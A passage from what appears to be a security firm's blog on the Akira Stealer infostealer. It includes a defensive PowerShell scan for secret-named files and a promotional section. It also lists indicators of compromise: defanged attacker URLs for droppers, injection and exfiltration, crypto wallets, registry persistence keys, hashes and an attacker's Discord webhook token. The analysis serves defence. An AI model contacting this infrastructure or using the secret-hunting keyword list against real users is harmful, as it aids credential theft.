Location, FileName |\n        Format-Table -AutoSize `\n            @{Label='File';       Expression={$_.FileName}},\n            @{Label='Location';   Expression={$_.Location}},\n            @{Label='Size (KB)';  Expression={$_. 'Size (KB)'}},\n            @{Label='Keyword';    Expression={$_.Keyword}}\n\n    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n}\nelse {\n    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n}\n\nWrite-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\nWrite-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[3724,24765,24766,24771,24776,24781,24785,24790,24795,24800,24805,24810,24815,24819,24824,24829,24834,24838,24843,24848,24852,24857,24862,24867,24872,24877,24881,24886,24891,24896,24900,24904,24909,24913,24918,24922,24927,24932,24937,24942,24947,24952,24957,24961,24966,24971,24976,24981,24986,24991,24996,25001,25006,25010,25015,25020,25024,25029,25034,25039,25044,25049,25054,25059,25064,25068,25072,25076,25081,25085,25090,25095,25100,25104,25109,25114,25119,25124,25129,25134,25139,25145,25150,25156,25161,25167,25173,25178,25183,25189],{"__ignoreMap":402},[7258,24767,24768],{"class":14951,"line":14952},[7258,24769,24770],{},"\u003C#\n",[7258,24772,24773],{"class":14951,"line":403},[7258,24774,24775],{},".SYNOPSIS\n",[7258,24777,24778],{"class":14951,"line":704},[7258,24779,24780],{},"    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n",[7258,24782,24783],{"class":14951,"line":15337},[7258,24784,17114],{"emptyLinePlaceholder":415},[7258,24786,24787],{"class":14951,"line":13492},[7258,24788,24789],{},".DESCRIPTION\n",[7258,24791,24792],{"class":14951,"line":15666},[7258,24793,24794],{},"    Scans Desktop, Documents, Downloads and OneDrive for files that:\n",[7258,24796,24797],{"class":14951,"line":13493},[7258,24798,24799],{},"      • Contain one of the defined keywords in their name\n",[7258,24801,24802],{"class":14951,"line":17117},[7258,24803,24804],{},"      • Have an allowed file extension\n",[7258,24806,24807],{"class":14951,"line":17123},[7258,24808,24809],{},"      • Are not larger than 2 MB\n",[7258,24811,24812],{"class":14951,"line":17369},[7258,24813,24814],{},"    Presents the results in a colored, tabular overview.\n",[7258,24816,24817],{"class":14951,"line":18290},[7258,24818,17114],{"emptyLinePlaceholder":415},[7258,24820,24821],{"class":14951,"line":18296},[7258,24822,24823],{},".NOTES\n",[7258,24825,24826],{"class":14951,"line":18302},[7258,24827,24828],{},"    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n",[7258,24830,24831],{"class":14951,"line":18308},[7258,24832,24833],{},"#>\n",[7258,24835,24836],{"class":14951,"line":18314},[7258,24837,17114],{"emptyLinePlaceholder":415},[7258,24839,24840],{"class":14951,"line":18320},[7258,24841,24842],{},"# -------------------------------------\n",[7258,24844,24845],{"class":14951,"line":18326},[7258,24846,24847],{},"# 1. Configuration\n",[7258,24849,24850],{"class":14951,"line":18332},[7258,24851,24842],{},[7258,24853,24854],{"class":14951,"line":18338},[7258,24855,24856],{},"$scanFolders = @(\n",[7258,24858,24859],{"class":14951,"line":18344},[7258,24860,24861],{},"    \"$env:USERPROFILE\\Desktop\",\n",[7258,24863,24864],{"class":14951,"line":18350},[7258,24865,24866],{},"    \"$env:USERPROFILE\\Documents\",\n",[7258,24868,24869],{"class":14951,"line":18356},[7258,24870,24871],{},"    \"$env:USERPROFILE\\Downloads\",\n",[7258,24873,24874],{"class":14951,"line":18362},[7258,24875,24876],{},"    \"$env:USERPROFILE\\OneDrive\"\n",[7258,24878,24879],{"class":14951,"line":18368},[7258,24880,18509],{},[7258,24882,24883],{"class":14951,"line":18374},[7258,24884,24885],{},"$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n",[7258,24887,24888],{"class":14951,"line":19040},[7258,24889,24890],{},"$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n",[7258,24892,24893],{"class":14951,"line":19045},[7258,24894,24895],{},"$maxSize    = 2MB\n",[7258,24897,24898],{"class":14951,"line":19050},[7258,24899,17114],{"emptyLinePlaceholder":415},[7258,24901,24902],{"class":14951,"line":19055},[7258,24903,24842],{},[7258,24905,24906],{"class":14951,"line":19061},[7258,24907,24908],{},"# 2. Scan and Collect Matches\n",[7258,24910,24911],{"class":14951,"line":19066},[7258,24912,24842],{},[7258,24914,24915],{"class":14951,"line":19071},[7258,24916,24917],{},"$matches = [System.Collections.Generic.List[PSObject]]::new()\n",[7258,24919,24920],{"class":14951,"line":19076},[7258,24921,17114],{"emptyLinePlaceholder":415},[7258,24923,24924],{"class":14951,"line":19081},[7258,24925,24926],{},"foreach ($folder in $scanFolders) {\n",[7258,24928,24929],{"class":14951,"line":19086},[7258,24930,24931],{},"    if (-not (Test-Path $folder)) { continue }\n",[7258,24933,24934],{"class":14951,"line":19091},[7258,24935,24936],{},"    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n",[7258,24938,24939],{"class":14951,"line":19097},[7258,24940,24941],{},"        # 2.1 Extension filter\n",[7258,24943,24944],{"class":14951,"line":19103},[7258,24945,24946],{},"        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n",[7258,24948,24949],{"class":14951,"line":19109},[7258,24950,24951],{},"        # 2.2 Size filter\n",[7258,24953,24954],{"class":14951,"line":19114},[7258,24955,24956],{},"        if ($_.Length -gt $maxSize) { return }\n",[7258,24958,24959],{"class":14951,"line":19119},[7258,24960,17114],{"emptyLinePlaceholder":415},[7258,24962,24963],{"class":14951,"line":19124},[7258,24964,24965],{},"        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n",[7258,24967,24968],{"class":14951,"line":19129},[7258,24969,24970],{},"        $hit = $null\n",[7258,24972,24973],{"class":14951,"line":19135},[7258,24974,24975],{},"        foreach ($kw in $keywords) {\n",[7258,24977,24978],{"class":14951,"line":19140},[7258,24979,24980],{},"            if ($_.Name.ToLower().Contains($kw)) {\n",[7258,24982,24983],{"class":14951,"line":19145},[7258,24984,24985],{},"                $hit = $kw\n",[7258,24987,24988],{"class":14951,"line":19150},[7258,24989,24990],{},"                break\n",[7258,24992,24993],{"class":14951,"line":19155},[7258,24994,24995],{},"            }\n",[7258,24997,24998],{"class":14951,"line":19160},[7258,24999,25000],{},"        }\n",[7258,25002,25003],{"class":14951,"line":19165},[7258,25004,25005],{},"        if (-not $hit) { return }\n",[7258,25007,25008],{"class":14951,"line":19171},[7258,25009,17114],{"emptyLinePlaceholder":415},[7258,25011,25012],{"class":14951,"line":19177},[7258,25013,25014],{},"        # 2.4 Build relative path\n",[7258,25016,25017],{"class":14951,"line":19183},[7258,25018,25019],{},"        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n",[7258,25021,25022],{"class":14951,"line":19189},[7258,25023,17114],{"emptyLinePlaceholder":415},[7258,25025,25026],{"class":14951,"line":19194},[7258,25027,25028],{},"        # 2.5 Collect\n",[7258,25030,25031],{"class":14951,"line":19199},[7258,25032,25033],{},"        $matches.Add([PSCustomObject]@{\n",[7258,25035,25036],{"class":14951,"line":19205},[7258,25037,25038],{},"            FileName    = $_.Name\n",[7258,25040,25041],{"class":14951,"line":19211},[7258,25042,25043],{},"            Location    = $rel\n",[7258,25045,25046],{"class":14951,"line":19217},[7258,25047,25048],{},"            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n",[7258,25050,25051],{"class":14951,"line":19223},[7258,25052,25053],{},"            Keyword     = $hit\n",[7258,25055,25056],{"class":14951,"line":19228},[7258,25057,25058],{},"        })\n",[7258,25060,25061],{"class":14951,"line":19233},[7258,25062,25063],{},"    }\n",[7258,25065,25066],{"class":14951,"line":19239},[7258,25067,15669],{},[7258,25069,25070],{"class":14951,"line":19244},[7258,25071,17114],{"emptyLinePlaceholder":415},[7258,25073,25074],{"class":14951,"line":19249},[7258,25075,24842],{},[7258,25077,25078],{"class":14951,"line":19255},[7258,25079,25080],{},"# 3. Display Results\n",[7258,25082,25083],{"class":14951,"line":19261},[7258,25084,24842],{},[7258,25086,25087],{"class":14951,"line":19267},[7258,25088,25089],{},"clear\n",[7258,25091,25092],{"class":14951,"line":19272},[7258,25093,25094],{},"Write-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\n",[7258,25096,25097],{"class":14951,"line":19278},[7258,25098,25099],{},"Write-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n",[7258,25101,25102],{"class":14951,"line":19284},[7258,25103,17114],{"emptyLinePlaceholder":415},[7258,25105,25106],{"class":14951,"line":19289},[7258,25107,25108],{},"if ($matches.Count -gt 0) {\n",[7258,25110,25111],{"class":14951,"line":19295},[7258,25112,25113],{},"    $matches |\n",[7258,25115,25116],{"class":14951,"line":19301},[7258,25117,25118],{},"        Sort-Object Location, FileName |\n",[7258,25120,25121],{"class":14951,"line":19306},[7258,25122,25123],{},"        Format-Table -AutoSize `\n",[7258,25125,25126],{"class":14951,"line":19311},[7258,25127,25128],{},"            @{Label='File';       Expression={$_.FileName}},\n",[7258,25130,25131],{"class":14951,"line":19316},[7258,25132,25133],{},"            @{Label='Location';   Expression={$_.Location}},\n",[7258,25135,25136],{"class":14951,"line":19322},[7258,25137,25138],{},"            @{Label='Size (KB)';  Expression={$_. 'Size (KB)'}},\n",[7258,25140,25142],{"class":14951,"line":25141},79,[7258,25143,25144],{},"            @{Label='Keyword';    Expression={$_.Keyword}}\n",[7258,25146,25148],{"class":14951,"line":25147},80,[7258,25149,17114],{"emptyLinePlaceholder":415},[7258,25151,25153],{"class":14951,"line":25152},81,[7258,25154,25155],{},"    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n",[7258,25157,25159],{"class":14951,"line":25158},82,[7258,25160,15669],{},[7258,25162,25164],{"class":14951,"line":25163},83,[7258,25165,25166],{},"else {\n",[7258,25168,25170],{"class":14951,"line":25169},84,[7258,25171,25172],{},"    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n",[7258,25174,25176],{"class":14951,"line":25175},85,[7258,25177,15669],{},[7258,25179,25181],{"class":14951,"line":25180},86,[7258,25182,17114],{"emptyLinePlaceholder":415},[7258,25184,25186],{"class":14951,"line":25185},87,[7258,25187,25188],{},"Write-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\n",[7258,25190,25192],{"class":14951,"line":25191},88,[7258,25193,25194],{},"Write-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[2559,25196],{"className":25197},[14110,14111],[13828,25199,25201],{"id":25200},"_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","12. Beyond Response – How glueckkanja CSOC Turns Incidents into Insights",[353,25203,9352],{},[353,25205,25206,25207],{},"Most security operations centers stop at containment.\n",[433,25208,25209],{},"We don’t.",[353,25211,25212],{},"At glueckkanja CSOC, we believe incident response isn’t the finish line—it’s the starting point.",[353,25214,25215],{},"When others declare victory and move on, we dive deeper. For us, each incident is an opportunity to learn, adapt, and become stronger. Our relentless curiosity, fueled by years of deep forensic expertise and reverse engineering capability, ensures we don’t just defend—we anticipate.",[353,25217,25218,25219,456],{},"This philosophy is why we built the ",[433,25220,25221],{},"Akira Compromise Reporter",[353,25223,25224],{},"Far beyond basic detection, this internally developed forensic tool uses our intimate knowledge of the Akira Stealer to provide absolute clarity on what data has been compromised. Within minutes, it produces a precise, actionable snapshot of the incident's full impact:",[367,25226,25227,25230,25233],{},[370,25228,25229],{},"Exactly which credentials, tokens, and browser sessions were stolen.",[370,25231,25232],{},"Precisely which cryptocurrency wallets, messaging accounts, and files were exposed.",[370,25234,25235],{},"A clear, structured, and detailed forensic report—transforming uncertainty into immediate, informed action.",[353,25237,25238],{},[356,25239],{"alt":25240,"src":25241},"Akira Compromise Report","https://res.cloudinary.com/c4a8/image/upload/v1749796758/blog/pics/akira-compromise-report.png",[353,25243,25244],{},"Because at glueckkanja, we measure our success not just by threats blocked, but by clarity provided. ybersecurity, done right, isn’t about simply reacting to incidents—It’s about understanding, adapting, and always staying one step ahead.",[353,25246,25247],{},[433,25248,25249],{},"That’s the glueckkanja CSOC difference.",[13828,25251,25253],{"id":25252},"_13-indicators-of-compromise-iocs","13. Indicators of Compromise (IOCs)",[353,25255,9352],{},[353,25257,25258],{},"Below is a comprehensive, verbatim collection of IOCs extracted directly from the malware code during our internal reverse engineering process at glueckkanja CSOC. No assumptions or external threat intel sources were used — all indicators are confirmed findings. All URLs are deliberately obfuscated to prevent accidental clicks.",[353,25260,25261],{},[433,25262,25263],{},"Abbreviations:",[367,25265,25266,25272],{},[370,25267,25268,25271],{},[433,25269,25270],{},"TG:"," Telegram reporting channel",[370,25273,25274,25277],{},[433,25275,25276],{},"Alt:"," Alternate (fallback) endpoint",[2548,25279,25281],{"id":25280},"_1-domains-urls","1. Domains & URLs",[353,25283,10713],{},[8921,25285,8923,25287],{"className":25286,"style":17945},[24362],[8925,25288,25289,8923,25301,8923,25314,8923,25327,8923,25340,8923,25353,8923,25366,8923,25379,8923,25395,8923,25411,8923,25424,8923,25437,8923,25450,8923,25463,8923,25476,8923,25489,8923,25502,8923,25515,8923,25528,8923,25541,8923,25555,8923,25568],{},[8928,25290,2557,25291,2557,25295,2557,25299,8923],{},[8932,25292,25294],{"style":25293},"text-align: left; width: 18%;","Category",[8932,25296,25298],{"style":25297},"text-align: left; width: 52%;","Obfuscated URL",[8932,25300,7440],{"style":18113},[8928,25302,2557,25303,2557,25306,2557,25311,8923],{},[8948,25304,25305],{},"Primary Injection",[8948,25307,25308],{},[3724,25309,25310],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/inj[.]php",[8948,25312,25313],{},"Initial attacker webhook endpoint",[8928,25315,2557,25316,2557,25319,2557,25324,8923],{"style":17969},[8948,25317,25318],{},"Fallback Injection",[8948,25320,25321],{},[3724,25322,25323],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/inj[.]php",[8948,25325,25326],{},"Alternate injector endpoint",[8928,25328,2557,25329,2557,25332,2557,25337,8923],{},[8948,25330,25331],{},"Error Reporting (TG)",[8948,25333,25334],{},[3724,25335,25336],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/link[.]php",[8948,25338,25339],{},"Telegram error/log reporting URL",[8928,25341,2557,25342,2557,25345,2557,25350,8923],{"style":17969},[8948,25343,25344],{},"Error Reporting (Alt)",[8948,25346,25347],{},[3724,25348,25349],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/link[.]php",[8948,25351,25352],{},"Alternate error/log reporting URL",[8928,25354,2557,25355,2557,25358,2557,25363,8923],{},[8948,25356,25357],{},"Vanity Bot (TG)",[8948,25359,25360],{},[3724,25361,25362],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/mumu[.]php",[8948,25364,25365],{},"Vanity address notification endpoint",[8928,25367,2557,25368,2557,25371,2557,25376,8923],{"style":17969},[8948,25369,25370],{},"Vanity Bot (Alt)",[8948,25372,25373],{},[3724,25374,25375],{},"https[:]//cosmoplanets[.]net/well-known/pki-validation/mumu[.]php",[8948,25377,25378],{},"Alternate vanity notification endpoint",[8928,25380,2557,25381,2557,25384,2557,25389,8923],{},[8948,25382,25383],{},"Exodus Injection",[8948,25385,25386],{},[3724,25387,25388],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/exodus[.]asar",[8948,25390,25391,25392,25394],{},"Electron ",[3724,25393,17851],{}," app module",[8928,25396,2557,25397,2557,25400,2557,25405,8923],{"style":17969},[8948,25398,25399],{},"Atomic Injection",[8948,25401,25402],{},[3724,25403,25404],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/atomic[.]asar",[8948,25406,25391,25407,25410],{},[3724,25408,25409],{},"AtomicWallet"," module",[8928,25412,2557,25413,2557,25416,2557,25421,8923],{},[8948,25414,25415],{},"Updater Download",[8948,25417,25418],{},[3724,25419,25420],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/Updater[.]exe",[8948,25422,25423],{},"Persistence dropper executable",[8928,25425,2557,25426,2557,25429,2557,25434,8923],{"style":17969},[8948,25427,25428],{},"Gofile API List",[8948,25430,25431],{},[3724,25432,25433],{},"https[:]//api.gofile[.]io/servers",[8948,25435,25436],{},"Retrieves best GoFile upload server",[8928,25438,2557,25439,2557,25442,2557,25447,8923],{},[8948,25440,25441],{},"Discord Token Check",[8948,25443,25444],{},[3724,25445,25446],{},"https[:]//discordapp[.]com/api/v9/users/@me",[8948,25448,25449],{},"Validates stolen Discord token",[8928,25451,2557,25452,2557,25455,2557,25460,8923],{"style":17969},[8948,25453,25454],{},"Discord Billing Info",[8948,25456,25457],{},[3724,25458,25459],{},"https[:]//discord[.]com/api/users/@me/billing/payment-sources",[8948,25461,25462],{},"Retrieves billing methods",[8928,25464,2557,25465,2557,25468,2557,25473,8923],{},[8948,25466,25467],{},"Google OAuth Replay",[8948,25469,25470],{},[3724,25471,25472],{},"https[:]//accounts[.]google[.]com/oauth/multilogin",[8948,25474,25475],{},"Replays stolen Google session tokens",[8928,25477,2557,25478,2557,25481,2557,25486,8923],{"style":17969},[8948,25479,25480],{},"IP Check (hosting)",[8948,25482,25483],{},[3724,25484,25485],{},"http[:]//ip-api[.]com/line/?fields=hosting",[8948,25487,25488],{},"Hosting environment detection",[8928,25490,2557,25491,2557,25494,2557,25499,8923],{},[8948,25492,25493],{},"IP Lookup (geo)",[8948,25495,25496],{},[3724,25497,25498],{},"http[:]//ip-api[.]com/json/{ip}",[8948,25500,25501],{},"Geolocation by IP",[8928,25503,2557,25504,2557,25507,2557,25512,8923],{"style":17969},[8948,25505,25506],{},"Public IP Retrieval",[8948,25508,25509],{},[3724,25510,25511],{},"https[:]//api[.]ipify[.]org",[8948,25513,25514],{},"Fetches external IP address",[8928,25516,2557,25517,2557,25520,2557,25525,8923],{},[8948,25518,25519],{},"File.io Upload",[8948,25521,25522],{},[3724,25523,25524],{},"https[:]//file[.]io/",[8948,25526,25527],{},"Secondary exfiltration channel",[8928,25529,2557,25530,2557,25533,2557,25538,8923],{"style":17969},[8948,25531,25532],{},"Oshi.at Upload",[8948,25534,25535],{},[3724,25536,25537],{},"http[:]//oshi[.]at/",[8948,25539,25540],{},"Tertiary exfiltration channel",[8928,25542,2557,25543,2557,25546,2557,25552,8923],{},[8948,25544,25545],{},"JS Dropper Primary",[8948,25547,25548],{},[374,25549,25551],{"href":25550,"target":5319},"https://rentry.co/7vzd22fg36hfdd33/raw","https[:]//rentry[.]co/7vzd22fg36hfdd33/raw",[8948,25553,25554],{},"Remote reference to actual ZIP URL",[8928,25556,2557,25557,2557,25560,2557,25565,8923],{"style":17969},[8948,25558,25559],{},"JS Dropper Fallback 1",[8948,25561,25562],{},[374,25563,25564],{"href":16863,"target":5319},"https[:]//cosmicdust[.]zip/.well-known/pki-validation/pyth.zip",[8948,25566,25567],{},"Alternative payload ZIP",[8928,25569,2557,25570,2557,25573,2557,25578,8923],{},[8948,25571,25572],{},"JS Dropper Fallback 2",[8948,25574,25575],{},[374,25576,25577],{"href":16868,"target":5319},"https[:]//cosmoplanets[.]net/well-known/pki-validation/pyth.zip",[8948,25579,25580],{},"Secondary fallback payload ZIP",[2559,25582],{"className":25583},[14110,14111],[2548,25585,25587],{"id":25586},"_2-cryptocurrency-addresses","2. Cryptocurrency Addresses",[353,25589,10713],{},[8921,25591,8923,25593],{"className":25592,"style":17945},[24362],[8925,25594,25595,8923,25603,8923,25613,8923,25623,8923,25633,8923,25642,8923,25652,8923,25662,8923,25672,8923,25682,8923,25692],{},[8928,25596,2557,25597,2557,25600,8923],{},[8932,25598,25599],{"style":24373},"Currency",[8932,25601,25602],{"style":18113},"Address",[8928,25604,2557,25605,2557,25608,8923],{},[8948,25606,25607],{},"BTC",[8948,25609,25610],{},[3724,25611,25612],{},"bc1qnmz2l8lr0yzj9eun48dyds7rlzg6t6hk5vw5zt",[8928,25614,2557,25615,2557,25618,8923],{"style":17969},[8948,25616,25617],{},"ETH",[8948,25619,25620],{},[3724,25621,25622],{},"0xa8a2C9e3fbCde807101dBD87aF7b51583f83d1D5",[8928,25624,2557,25625,2557,25628,8923],{},[8948,25626,25627],{},"DOGE",[8948,25629,25630],{},[3724,25631,25632],{},"DACeoqWDPmNARSZAeDZPFwqwecbByaksmd",[8928,25634,2557,25635,2557,25638,8923],{"style":17969},[8948,25636,25637],{},"LTC",[8948,25639,25640],{},[3724,25641,24403],{},[8928,25643,2557,25644,2557,25647,8923],{},[8948,25645,25646],{},"XMR",[8948,25648,25649],{},[3724,25650,25651],{},"4AVdkoC16zwcjxF4q9cXdL2D4vGqC9iPAcQ9gmHzQ7JS1fUUff6Za3D6CKm9MsDrhSDRY9hgeca7yKnMGpaD8dq6Bo3mT7D",[8928,25653,2557,25654,2557,25657,8923],{"style":17969},[8948,25655,25656],{},"BCH",[8948,25658,25659],{},[3724,25660,25661],{},"qrfs8ee558t0a2dlp9v6h4qzns5cd6pltqrrn883xs",[8928,25663,2557,25664,2557,25667,8923],{},[8948,25665,25666],{},"DASH",[8948,25668,25669],{},[3724,25670,25671],{},"XpeiSH1MfQYeehTfxosYHyTHzbgu2LNsG1",[8928,25673,2557,25674,2557,25677,8923],{"style":17969},[8948,25675,25676],{},"TRX",[8948,25678,25679],{},[3724,25680,25681],{},"TFuYQoosCUqbVjibowMqaa3W3h3RtAVDbK",[8928,25683,2557,25684,2557,25687,8923],{},[8948,25685,25686],{},"XRP",[8948,25688,25689],{},[3724,25690,25691],{},"r36AwwhUH7BRujevi5mukbDrG46KGbTk8V",[8928,25693,2557,25694,2557,25697,8923],{"style":17969},[8948,25695,25696],{},"XLM",[8948,25698,25699],{},[3724,25700,25701],{},"GAEPMD52PX7FYX65AJJLEFZSH3DZSL3DKM2XRXHVJP4CLJFIBKI25C33",[2559,25703],{"className":25704},[14110,14111],[2548,25706,25708],{"id":25707},"_3-registry-keys-paths","3. Registry Keys / Paths",[353,25710,10713],{},[8921,25712,8923,25714],{"className":25713,"style":17945},[24362],[8925,25715,25716,8923,25723,8923,25733,8923,25743,8923,25756],{},[8928,25717,2557,25718,2557,25721,8923],{},[8932,25719,14919],{"style":25720},"text-align: left; width: 60%;",[8932,25722,14463],{"style":18113},[8928,25724,2557,25725,2557,25730,8923],{},[8948,25726,25727],{},[3724,25728,25729],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc",[8948,25731,25732],{},"Checks for virtual GPU driver signature",[8928,25734,2557,25735,2557,25740,8923],{"style":17969},[8948,25736,25737],{},[3724,25738,25739],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName",[8948,25741,25742],{},"Checks for virtual GPU provider name",[8928,25744,2557,25745,2557,25753,8923],{},[8948,25746,25747,25750,25751,8133],{},[3724,25748,25749],{},"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"," (value ",[433,25752,14930],{},[8948,25754,25755],{},"Persistence via Run key (Updater.exe)",[8928,25757,2557,25758,2557,25762,8923],{"style":17969},[8948,25759,25760],{},[3724,25761,14938],{},[8948,25763,25764],{},"Persistence Executable",[2559,25766],{"className":25767},[14110,14111],[2548,25769,25771],{"id":25770},"_5-files-hashes","5. Files & Hashes",[353,25773,10713],{},[8921,25775,8923,25777],{"className":25776,"style":17945},[24362],[8925,25778,25779,8923,25790,8923,25802,8923,25814,8923,25827,8923,25839,8923,25851,8923,25863,8923,25875,8923,25888,8923,25900,8923,25913,8923,25925],{},[8928,25780,2557,25781,2557,25783,2557,25787,8923],{},[8932,25782,24705],{"style":25293},[8932,25784,25786],{"style":25785},"text-align: left; width: 62%;","SHA256",[8932,25788,25789],{"style":18113},"Size (bytes)",[8928,25791,2557,25792,2557,25794,2557,25799,8923],{},[8948,25793,15090],{},[8948,25795,25796],{},[3724,25797,25798],{},"331A4A4D721A1B5B1BB5E9A5C13462D5CDB16248DEFE0F16BE6E1E57C275E380",[8948,25800,25801],{},"63936274",[8928,25803,2557,25804,2557,25806,2557,25811,8923],{"style":17969},[8948,25805,13874],{},[8948,25807,25808],{},[3724,25809,25810],{},"C98F0F5B89C6DAC1482286FAA2E33A84230C26EA38DA4E013665582C9A04213B",[8948,25812,25813],{},"162036224",[8928,25815,2557,25816,2557,25819,2557,25824,8923],{},[8948,25817,25818],{},"jscrypter.js",[8948,25820,25821],{},[3724,25822,25823],{},"0A47985F8B3716058B0DF6C68EC97D0F1F3CB0F7A31562A819C3E766ED4CDCEF",[8948,25825,25826],{},"1429",[8928,25828,2557,25829,2557,25831,2557,25836,8923],{"style":17969},[8948,25830,16080],{},[8948,25832,25833],{},[3724,25834,25835],{},"1E666F3CF6E3DA6EED973E00E81EC721B33B17D4E981CB506F62F349DC1B3343",[8948,25837,25838],{},"30138",[8928,25840,2557,25841,2557,25843,2557,25848,8923],{},[8948,25842,16077],{},[8948,25844,25845],{},[3724,25846,25847],{},"E375DE29E23C43627B2894EA01B6B1C7D9B1BD37E7305EEC7185CEE9719924A7",[8948,25849,25850],{},"7155",[8928,25852,2557,25853,2557,25855,2557,25860,8923],{"style":17969},[8948,25854,16005],{},[8948,25856,25857],{},[3724,25858,25859],{},"972C634FD0666BCA12A6B7A50E69C32610321E9EC4D28D65734E55437D345CC6",[8948,25861,25862],{},"211",[8928,25864,2557,25865,2557,25867,2557,25872,8923],{},[8948,25866,13878],{},[8948,25868,25869],{},[3724,25870,25871],{},"850361AF7D6C006900FC638D6ACBD9A6362385BAD0530CFBD52555E6415DB3A4",[8948,25873,25874],{},"205210",[8928,25876,2557,25877,2557,25880,2557,25885,8923],{"style":17969},[8948,25878,25879],{},"exodus.asar",[8948,25881,25882],{},[3724,25883,25884],{},"6A3B5D5A6BA5925DF39351830D92A2B5E4720803FE9F8040C3E67C12F668F4EB",[8948,25886,25887],{},"132486332",[8928,25889,2557,25890,2557,25892,2557,25897,8923],{},[8948,25891,15149],{},[8948,25893,25894],{},[3724,25895,25896],{},"10E4A6B54CC0CF4D18DDE8B69E0B305ABE487E07ED990C5BFF82CE30B217B910",[8948,25898,25899],{},"28454",[8928,25901,2557,25902,2557,25905,2557,25910,8923],{"style":17969},[8948,25903,25904],{},"download.dat",[8948,25906,25907],{},[3724,25908,25909],{},"C49E83A5F154F7E54CA0CE9EECEA066A721966786F2850626252DDA0BE0BF79B",[8948,25911,25912],{},"21142",[8928,25914,2557,25915,2557,25917,2557,25922,8923],{},[8948,25916,16138],{},[8948,25918,25919],{},[3724,25920,25921],{},"E6F6AD49076367A58220E48691A34E33C18F0285FD9C50879A9B83A99F840AD7",[8948,25923,25924],{},"32375391",[8928,25926,2557,25927,2557,25929,2557,25934,8923],{"style":17969},[8948,25928,13870],{},[8948,25930,25931],{},[3724,25932,25933],{},"36C34E39DC7D54C4C97DDEB9B6C7FD429DB26C34D65CCE8BE3523FDFDB7CEBE0",[8948,25935,25936],{},"37652937",[2559,25938],{"className":25939},[14110,14111],[2548,25941,25943],{"id":25942},"_5-discord-telegram-identifier","5. Discord & Telegram Identifier",[353,25945,10713],{},[8921,25947,8923,25949],{"className":25948,"style":17945},[24362],[8925,25950,25951,8923,25957,8923,25967,8923,25977],{},[8928,25952,2557,25953,2557,25955,8923],{},[8932,25954,25294],{"style":19563},[8932,25956,7439],{"style":18113},[8928,25958,2557,25959,2557,25962,8923],{},[8948,25960,25961],{},"Discord Webhook ID",[8948,25963,25964],{},[3724,25965,25966],{},"1226766972675428372",[8928,25968,2557,25969,2557,25972,8923],{"style":17969},[8948,25970,25971],{},"Discord Webhook Token",[8948,25973,25974],{},[3724,25975,25976],{},"BuBywdldEWncg7fbIpEhCROLpkGLkYirOoP2bP-uzzOatDaxSpaWqaLNerun85qCfwNz",[8928,25978,2557,25979,2557,25982,8923],{},[8948,25980,25981],{},"Telegram ID",[8948,25983,25984],{},[3724,25985,25986],{},"5035121855",[2559,25988],{"className":25989},[14110,14111],[13828,25991,25993],{"id":25992},"_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","14. Reflecting on the Akira Stealer Incident: Strengthening Your Defense with glueckkanja CSOC",[353,25995,9352],{},[353,25997,25998],{},"Throughout this blog, we've explored the sophisticated nature of the Akira Infostealer—an advanced cyber threat characterized by targeted credential theft, stealthy data exfiltration, and persistent methods to evade traditional defenses. Understanding how this malware functions, the risks it poses, and the vulnerabilities it exploits is crucial in building a robust cybersecurity strategy.",[353,26000,26001],{},"The Akira Infostealer specifically targets sensitive data such as login credentials, browser sessions, cryptocurrency wallets, messaging services, and personal or organizational files. Its calculated and precise methods demand more than just standard security measures—they require continuous monitoring, in-depth forensic analysis, and proactive threat intelligence.",[353,26003,26004],{},"At glueckkanja CSOC, we leverage our deep technical expertise and advanced analytical capabilities to go beyond simple detection. Our specialized team continually monitors threats in real-time from our dedicated CSOC servers, enabling immediate identification, thorough investigation, and effective neutralization of threats like the Akira Infostealer.",[353,26006,26007],{},"But our work doesn’t stop at incident response. Every detected incident enriches our knowledge base, enhancing our security posture and ensuring we remain several steps ahead of future threats. With glueckkanja CSOC, you gain more than protection—you gain an adaptive security partner committed to your long-term resilience.",[353,26009,26010],{},"Take the next step in securing your organization's digital 